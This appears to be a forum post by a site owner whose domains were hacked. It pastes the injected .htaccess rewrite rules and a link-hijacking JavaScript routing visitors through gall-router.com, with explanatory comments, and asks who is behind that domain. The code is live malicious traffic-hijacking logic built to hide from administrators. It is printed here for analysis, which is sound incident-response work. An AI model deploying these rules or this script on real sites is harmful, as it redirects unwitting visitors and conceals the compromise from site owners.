Someone hacked about 20 of my domains with agp sql,
changed the .htaccess and put something like this in it:
# Injected mod_rewrite rules, as pasted by the poster.
# The trailing "^M" marks look like carriage returns (CRLF line endings) made
# visible by the paste -- TODO confirm against the file on disk.
#
# A request for the site root is mapped to index.php.
RewriteRule ^$ index.php^M
# The conditions below gate the RewriteRule that follows them. All must hold:
#   - the requested path is an existing regular file (-f)
#   - it is not phpinfo.php itself
#   - the Referer header starts with http:// (case-insensitive)
#   - the Referer is not nextpicturez.com (with or without www.)
#   - the request method is GET
# A request that carries no Referer does not match, so someone who opens the
# site by typing its address sees the normal pages; only visitors arriving
# through a link are rewritten. This is why the change is easy to miss.
RewriteCond %{REQUEST_FILENAME} -f^M
RewriteCond %{REQUEST_FILENAME} !phpinfo.php^M
RewriteCond %{HTTP_REFERER} ^http:// [NC]^M
# NOTE(review): the next condition is wrapped across two lines in the paste;
# as a single directive the pattern reads !^http://(www\.)?nextpicturez.com
RewriteCond %{HTTP_REFERER} !^
http://(www\.)?nextpicturez.com [NC]^M
RewriteCond %{REQUEST_METHOD} ^GET$^M
# Matching requests for .html/.htm/.shtml/.php files are rewritten to
# phpinfo.php, with the path, the extension and the query string passed as
# a, b and c. The line is cut off in the paste (closing brace and any flags
# are not visible).
RewriteRule ^(.*)\.(html|htm|shtml|php)$ phpinfo.php?a=$1&b=$2&c=%{QUERY_STRING
# A request for "j" is rewritten to phpinfo.php?d=j; [L] ends rule processing
# for that request.
RewriteRule ^j$ phpinfo.php?d=j [L]
and phpinfo.php contains this script (it was encoded):
// Script found in the injected phpinfo.php, as pasted by the poster.
// NOTE(review): the string "hahahaha" in the condition below is not valid
// JavaScript; it looks like a forum word filter replaced an operator,
// presumably "==" -- confirm against the decoded file.

// Writes an empty string here; whatever markup the original call emitted is
// not visible in this paste.
document.write('');
/**
 * Temporarily prefixes every link on the page with a third-party URL, sets a
 * marker cookie, and removes the prefix again shortly afterwards.
 *
 * Nothing in the visible snippet calls remake(); the trigger is not shown.
 *
 * Indicators visible in this code: the "zq=1" cookie and link targets that
 * begin with the traff.php?affid=...&u= prefix.
 */
function remake() {
// Prefix put in front of each link; the original link ends up as the value
// of the trailing "u=" parameter.
var s="http://gall-router.com/traff.php?affid=frog33&u=";
// Four tests: cookie contains "zq=1", cookie contains "adm", cookie contains
// "login", referrer contains "admin". If the garbled operator is "==", each
// test reads "== -1" (substring absent), i.e. the body runs only when the
// marker cookie is not yet set and the visitor does not look like a
// logged-in or admin user -- presumably to stay hidden from the site owner.
if(document.cookie.indexOf("zq=1")hahahaha-1&&document.cookie.indexOf("adm")hahahaha-1&&document.cookie.indexOf("login")hahahaha-1&&document.referrer.indexOf("admin")hahahaha-1)
{
// Rewrite every link that has an href so it points at the prefix URL first.
for(var i=0;i<document.links.length;++i) {
if(document.links[i].href)document.links[i].href=s+document.links[i].href
}
// Set the "zq=1" marker cookie with an expiry 86400000 ms (24 hours) ahead,
// which the condition above checks for on later page loads.
var today=new Date();
var expires=new Date();
expires.setTime(today.getTime()+86400000);
document.cookie="zq=1; expires="+expires.toGMTString();
// Undo step: cuts s.length characters off the front of each href, which
// removes the prefix added above and restores the original link targets.
function normal() {
for(var i=0;i<document.links.length;++i) {
if(document.links[i].href)document.links[i].href=document.links[i].href.substring(s.length)
}
}
// The links stay rewritten for 300 ms, then normal() restores them, so the
// change is not visible when the page is inspected afterwards.
setTimeout(normal,300)
}
}
I see this URL in the code:
http://gall-router.com/traff.php?affid=frog33
but I could not find any information about the company behind gall-router.com; the domain is very new, and its DNS is very new too...
Does anybody know gall-router.com? Who the hell are they?